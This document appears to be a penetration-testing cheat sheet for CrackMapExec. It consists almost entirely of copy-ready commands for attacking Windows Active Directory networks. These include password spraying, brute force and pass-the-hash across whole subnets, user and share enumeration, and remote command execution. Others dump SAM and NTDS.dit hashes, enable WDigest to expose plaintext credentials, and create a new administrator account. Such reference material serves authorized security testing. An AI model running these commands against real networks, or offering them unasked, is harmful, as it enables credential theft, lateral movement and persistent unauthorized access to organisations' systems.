CRACKMAPEXEC (CME)¶
CrackMapExec (CME) is an open-source post-exploitation tool that helps penetration testers to perform various network-level attacks and enumeration tasks. It is particularly useful for managing large Active Directory (AD) networks.
KEY FUNCTIONALITIES¶
- Enumerating Users and Groups
Lists users, groups, and other AD objects
- Password Spraying
Tests a single password against multiple user accounts
- Command Execution
Executes commands remotely on target systems
- Dumping Hashes
Extracts password hashes from remote systems
- Accessing Shares
Lists and accesses SMB shares on remote systems
TARGET FORMATS¶
-
Single IP Address:
crackmapexec smb [IP-ADDRESS-1] [IP-ADDRESS-2]
-
IP range
crackmapexec smb [IP-ADDRESS]-28 [IP-ADDRESS]-67
-
CIDR notation
crackmapexec smb [IP-ADDRESS]/24
-
Targets from file
crackmapexec smb targets.txt
CONNECT TO TARGET USING LOCAL ACCOUNT¶
-
Connect with local account
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth
-
Using Null Session:
crackmapexec smb [IP-ADDRESS] -u "" -p ""
PASS THE HASH AGAINST A SUBNET¶
-
Pass the hash with local auth
crackmapexec smb [IP_ADDRESS]/24 -u [USERNAME] -H '[LMHASH:NTHASH]' --local-auth
-
Standard Pass the Hash
crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -H '[NTHASH]'
BRUTEFORCING AND PASSWORD SPRAYING¶
-
Single password
crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME]" -p "[PASSWORD]"
-
Multiple passwords
crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME]" -p "[PASSWORD1]" "[PASSWORD2]"
-
Multiple users
crackmapexec smb [IP-ADDRESS]/24 -u "[USERNAME1]" "[USERNAME2]" -p "[PASSWORD]"
-
Users and passwords from files
crackmapexec smb [IP-ADDRESS]/24 -u [USER_FILE] -p [PASS_FILE]
-
Users from file, hashes from file
crackmapexec smb [IP-ADDRESS]/24 -u [USER_FILE] -H [NTLM_HASH_FILE]
USERS ENUMERATION¶
-
Enumerate users
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --users
-
Perform RID bruteforce to get users
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --rid-brute
-
Enumerate domain groups
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --groups
-
Enumerate local users
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-users
HOSTS ENUMERATION¶
-
Generate a list of relayable hosts
crackmapexec smb [IP-ADDRESS]/24 --gen-relay-list output.txt
-
Enumerate available shares
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --shares
-
Get the active sessions
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --sessions
-
Check logged in users
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --lusers
-
Get the password policy
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --pass-pol
COMMAND EXECUTION METHODS¶
-
Execute command through cmd.exe
crackmapexec smb [IP_ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'whoami'
-
Force the smbexec method
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'net user Administrator /domain' --exec-method smbexec
-
Execute commands through PowerShell
crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' -X 'whoami'
GETTING CREDENTIALS¶
-
Dump local SAM hashes
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --sam
-
Enable WDigest to get credentials from LSA memory
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --wdigest enable
-
Disable WDigest
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --wdigest disable
-
Query user sessions
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'quser'
-
Force logoff
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' -x 'logoff [SESSIONID]'
-
Dump the NTDS.dit from DC using secretsdump.py
crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' --ntds
-
Use Volume Shadow copy Service to dump NTDS.dit
crackmapexec smb [IP-ADDRESS] -u [USERNAME] -p '[PASSWORD]' --ntds vss
-
Dump the NTDS.dit password history
crackmapexec smb [IP-ADDRESS]/24 -u [USERNAME] -p '[PASSWORD]' --ntds-history
ADDITIONAL FEATURES¶
-
Upload a file to a remote share
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --upload local_file.txt \\remote\share
-
Download a file from a remote share
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth --download \\remote\share\remote_file.txt local_path
-
Add a new user
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -x "net user [NEW_USER] [new_pass] /add"
-
Add a user to Admins group
crackmapexec smb [IP-ADDRESS] -u '[USERNAME]' -p '[PASSWORD]' --local-auth -x "net localgroup administrators [NEW_USER] /add"